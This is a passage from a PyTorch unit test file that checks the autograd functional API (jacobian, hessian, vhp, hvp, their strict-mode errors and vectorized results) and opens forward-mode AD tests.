self._assert_interleaved_struct(res, foo(inp), inp)
def foo(a, b):
return b, 3 * a.narrow(0, 0, 3)
inp = (torch.rand(4), torch.rand(5))
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(*inp), inp)
def test_jacobian_err_check(self):
return self._test_jacobian_err_check(vectorize=False)
def test_jacobian_err_check_vectorize(self):
return self._test_jacobian_err_check(vectorize=True)
def test_jacobian_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jacobian(foo, inp, strict=True)
res = autogradF.jacobian(foo, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function is independent of input 0."):
res = autogradF.jacobian(bar, inp, strict=True)
res = autogradF.jacobian(bar, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jacobian(foo, inp, create_graph=True, strict=True)
res = autogradF.jacobian(foo, inp, create_graph=True, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res, torch.eye(4))
def test_jacobian_err_check_strict_vectorize(self):
def foo(x):
return x
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.jacobian(foo, inp, strict=True, vectorize=True)
def test_jacobian_no_grad(self):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs)
self.assertIsNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True)
self.assertIsNotNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
def _test_jacobian_output(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
res = autogradF.jacobian(exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNone(res.grad_fn)
def identity(x):
return x.clone()
inputs = torch.rand(4)
res = autogradF.jacobian(identity, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, identity(inputs), inputs)
self.assertIsNone(res.grad_fn)
self.assertEqual(res, torch.eye(4))
def add_exp_reducer(x, y):
return (x + y.exp()).sum(dim=1)
inputs = (torch.rand(4, 4), torch.rand(4, 4))
res = autogradF.jacobian(add_exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def test_jacobian_output(self):
self._test_jacobian_output(vectorize=False)
def test_jacobian_output_vectorize(self):
self._test_jacobian_output(vectorize=True)
def _test_jacobian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.jacobian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
res = autogradF.jacobian(expander, inputs, vectorize=vectorize)
self._assert_same_struct(res, torch.zeros(4))
def test_jacobian_scalar(self):
self._test_jacobian_scalar(vectorize=False)
def test_jacobian_scalar_vectorize(self):
self._test_jacobian_scalar(vectorize=True)
def _test_jacobian_create_graph(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_exp_reducer(x, y):
return (x + y).exp().sum(dim=1)
inputs = (torch.rand(4, 4, dtype=torch.double, requires_grad=True),
torch.rand(4, 4, dtype=torch.double, requires_grad=True))
res = autogradF.jacobian(add_exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def foo(x, y):
x = x.cos()
val, jac = autogradF.jacobian(add_exp_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].exp().sum() + val[1].exp().sum() + jac[0].exp().sum()
res = res + jac[1].exp().sum() + x.exp().sum() + y.exp().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_jacobian_create_graph(self):
self._test_jacobian_create_graph(vectorize=False)
def test_jacobian_create_graph_vectorize(self):
self._test_jacobian_create_graph(vectorize=True)
def _check_jacobian_vectorize_correctness(self, f, inputs):
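        # The vectorized code path must produce exactly the same Jacobian as the
        # default (non-vectorized) implementation; any mismatch points at a bug in
        # the vectorized fast path.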
expected = autogradF.jacobian(f, inputs, vectorize=False)
result = autogradF.jacobian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_jacobian_vectorize_correctness_simple(self):
def f(x):
return 3 * x ** 2
x = torch.randn(2, 3, 5)
self._check_jacobian_vectorize_correctness(f, x)
def test_jacobian_vectorize_correctness_multi_input(self):
def f(x, y):
return (x.cos() * x) @ y.sin()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_multi_input_multi_output(self):
def f(x, y):
return (x * x) @ y, x @ (x.sum(1) * y), y.sum()
x = torch.randn(5, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_unrelated_outputs(self):
def f(x, y):
return x, y, x, y
x = torch.randn(2)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_zero_dim(self):
# zero-dim output
def f(x, y):
return x.sum(), y.sum(), x * y
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
# zero-dim input
def g(x):
return torch.stack([x, x, x])
x = torch.randn([])
self._check_jacobian_vectorize_correctness(g, x)
# Mixed zero-dim input / zero-dim output
def h(x, y):
return y.sum(), x * y
x = torch.randn([])
y = torch.randn(1)
self._check_jacobian_vectorize_correctness(h, (x, y))
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_jacobian_vectorize_correctness_different_devices(self):
def f(x, y):
return x * y, (x * y).cuda()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_different_dtype(self):
def f(x, y):
return (x * y).float(), (x * y).double()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def _check_hessian_vectorize_correctness(self, f, inputs):
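        # Same agreement check for hessian: vectorize=True and vectorize=False
        # must return identical results.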
expected = autogradF.hessian(f, inputs, vectorize=False)
result = autogradF.hessian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_hessian_vectorize_correctness_simple(self):
def f(x):
return (3 * x ** 2).sum()
x = torch.randn(2, 3, 5)
self._check_hessian_vectorize_correctness(f, x)
def test_hessian_vectorize_correctness_multi_input(self):
def f(x, y, z):
return ((x.relu() * x) @ y.sin() @ z).sum()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
z = torch.randn(5, 5)
self._check_hessian_vectorize_correctness(f, (x, y, z))
def test_hessian_vectorize_correctness_unrelated_outputs(self):
# output unrelated to one input
def f(x, y):
return (x ** 2).sum()
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
# output unrelated to all inputs
def f(x, y):
return torch.randn([])
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
def _test_hessian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
def bar3(a):
return 3 * a.narrow(0, 0, 3), 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to hessian must be either a Tensor"):
res = autogradF.hessian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hessian must"):
res = autogradF.hessian(bar, inp, vectorize=vectorize)
err_msg_out = "The Tensor returned by the function given to hessian should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hessian(bar2, inp, vectorize=vectorize)
with self.assertRaisesRegex(RuntimeError, "The function given to hessian should return a single Tensor"):
res = autogradF.hessian(bar3, inp, vectorize=vectorize)
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def test_hessian_err_check(self):
self._test_hessian_err_check(vectorize=False)
def test_hessian_err_check_vectorize(self):
self._test_hessian_err_check(vectorize=True)
def test_hessian_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
            # A linear function for which the Jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hessian(foo, inp, strict=True)
res = autogradF.hessian(foo, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0"):
res = autogradF.hessian(bar, inp, strict=True)
res = autogradF.hessian(bar, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hessian(bar2, inp, strict=True)
res = autogradF.hessian(bar2, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
def test_hessian_err_check_strict_vectorize(self):
def foo(x):
return (x ** 3).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.hessian(foo, inp, strict=True, vectorize=True)
def test_hessian_no_grad(self):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs, create_graph=True)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
def _test_hessian_output(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
res = autogradF.hessian(pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res.grad_fn)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2), torch.rand(2, 2))
res = autogradF.hessian(add_pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
def test_hessian_output(self):
self._test_hessian_output(vectorize=False)
def test_hessian_output_vectorize(self):
self._test_hessian_output(vectorize=True)
def _test_hessian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
inputs = torch.rand([])
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
res = autogradF.hessian(bad_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
def test_hessian_scalar(self):
return self._test_hessian_scalar(vectorize=False)
def test_hessian_scalar_vectorize(self):
return self._test_hessian_scalar(vectorize=True)
def _test_hessian_create_graph(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
res = autogradF.hessian(pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2, dtype=torch.double, requires_grad=True),
torch.rand(2, 2, dtype=torch.double, requires_grad=True))
res = autogradF.hessian(add_pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
def flatten(inp):
return tuple(el_lvl2 for el_lvl1 in inp for el_lvl2 in el_lvl1)
gradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
gradgradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
def foo(x, y):
x = x.cos()
val, hess = autogradF.hessian(add_pow_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].cos().sum() + val[1].cos().sum() + hess[0].cos().sum()
res = res + hess[1].cos().sum() + x.cos().sum() + y.cos().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_hessian_create_graph(self):
self._test_hessian_create_graph(vectorize=False)
def test_hessian_create_graph_vectorize(self):
self._test_hessian_create_graph(vectorize=True)
def test_vhp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to vhp must be either a Tensor"):
res = autogradF.vhp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vhp must"):
res = autogradF.vhp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to vhp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.vhp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.vhp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to vhp must be either a Tensor or a tuple of Tensors"):
res = autogradF.vhp(foo, inp, (v, 2))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_vhp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
            # A linear function for which the Jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vhp(foo, inp, v, strict=True)
res = autogradF.vhp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vhp(bar, inp, v, strict=True)
res = autogradF.vhp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.vhp(bar2, inp, v, strict=True)
res = autogradF.vhp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_vhp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vhp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, vhp_val = autogradF.vhp(bar, inputs, v)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vhp_val[0].grad_fn)
self.assertIsNone(vhp_val[1].grad_fn)
def test_vhp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vhp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.vhp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_vhp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.vhp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, vhp_val = autogradF.vhp(bar, inputs, v, create_graph=True)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(vhp_val[0].grad_fn)
self.assertIsNotNone(vhp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vhp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_hvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
res = autogradF.hvp(foo, inp, v)
with self.assertRaisesRegex(TypeError, "The inputs given to hvp must be either a Tensor"):
res = autogradF.hvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hvp must"):
res = autogradF.hvp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to hvp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hvp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.hvp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to hvp must be either a Tensor or a tuple of Tensors"):
res = autogradF.hvp(foo, inp, (v, 2))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_hvp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
            # A linear function for which the Jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hvp(foo, inp, v, strict=True)
res = autogradF.hvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.hvp(bar, inp, v, strict=True)
res = autogradF.hvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hvp(bar2, inp, v, strict=True)
res = autogradF.hvp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_hvp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_hvp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, hvp_val = autogradF.hvp(bar, inputs, v)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(hvp_val[0].grad_fn)
self.assertIsNone(hvp_val[1].grad_fn)
def test_hvp_scalar(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.hvp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.exp().sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.hvp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_hvp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.hvp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, hvp_val = autogradF.hvp(bar, inputs, v, create_graph=True)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(hvp_val[0].grad_fn)
self.assertIsNotNone(hvp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.hvp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jacobian_match_vjp_jvp(self):
def foo(x):
return x ** 3 + x.sum()
inputs = torch.rand(4)
v = torch.rand(4)
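        # Reference identities being checked below (sketch in comment form,
        # with J = autogradF.jacobian(foo, inputs)):
        #   jvp(foo, inputs, v)[1] == J @ v    (Jacobian-vector product)
        #   vjp(foo, inputs, v)[1] == v @ J    (vector-Jacobian product)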
jac = autogradF.jacobian(foo, inputs)
jvp = autogradF.jvp(foo, inputs, v)[1]
vjp = autogradF.vjp(foo, inputs, v)[1]
self.assertEqual(jvp, torch.mm(jac, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vjp, torch.mm(v.unsqueeze(0), jac).squeeze(0))
def test_hessian_match_vhp_hvp(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4)
v = torch.rand(4)
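        # Analogous identities for the Hessian H = autogradF.hessian(foo, inputs):
        #   hvp(foo, inputs, v)[1] == H @ v   and   vhp(foo, inputs, v)[1] == v @ H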
hes = autogradF.hessian(foo, inputs)
hvp = autogradF.hvp(foo, inputs, v)[1]
vhp = autogradF.vhp(foo, inputs, v)[1]
self.assertEqual(hvp, torch.mm(hes, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vhp, torch.mm(v.unsqueeze(0), hes).squeeze(0))
class TestAutogradForwardMode(TestCase):
def tearDown(self):
# Ensure that a failing test won't make others fail
while fwAD._current_level >= 0:
fwAD.exit_dual_level()
super().tearDown()
def test_forward_level_cleanup(self):
def get_tensor_and_weak_ref():
# Create a new Tensor and weak reference
t = torch.rand(2, requires_grad=True)
return t, torch._C._WeakTensorRef(t)
# Sanity check that the helper function works as expected
t, t_ref = get_tensor_and_weak_ref()
self.assertFalse(t_ref.expired())
del t
self.assertTrue(t_ref.expired())
# Main test code
foo = torch.rand(2)
with fwAD.dual_level():
tangent, tangent_ref = get_tensor_and_weak_ref()
self.assertFalse(tangent_ref.expired())
dual = fwAD.make_dual(foo, tangent)
self.assertFalse(tangent_ref.expired())
# Make sure that the tangent we provided has been re-used as is
self.assertTrue(fwAD.unpack_dual(dual)[1] is tangent)
# Make sure that dual is keeping the tangent alive
del tangent
self.assertFalse(tangent_ref.expired())
            # Make sure that the dual level does not keep the C++
            # version of the tangent alive
del dual
self.assertTrue(tangent_ref.expired())
def test_size_check(self):
foo = torch.rand(2)
tangent = torch.rand(3)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Trying to set a forward gradient that has a different size"):
dual = fwAD.make_dual(foo, tangent)
dual = fwAD.make_dual(foo, tangent[1:])
    # The following tests are meant to ensure the behaviors below:
    #   - The default level system in the Python binding works
    #   - Only level 0 exists and nesting is properly disabled
    #   - Printing works fine
    #   - Basic packing/unpacking works
    #   - Advanced packing/unpacking works
    #     - Memory / version counter sharing
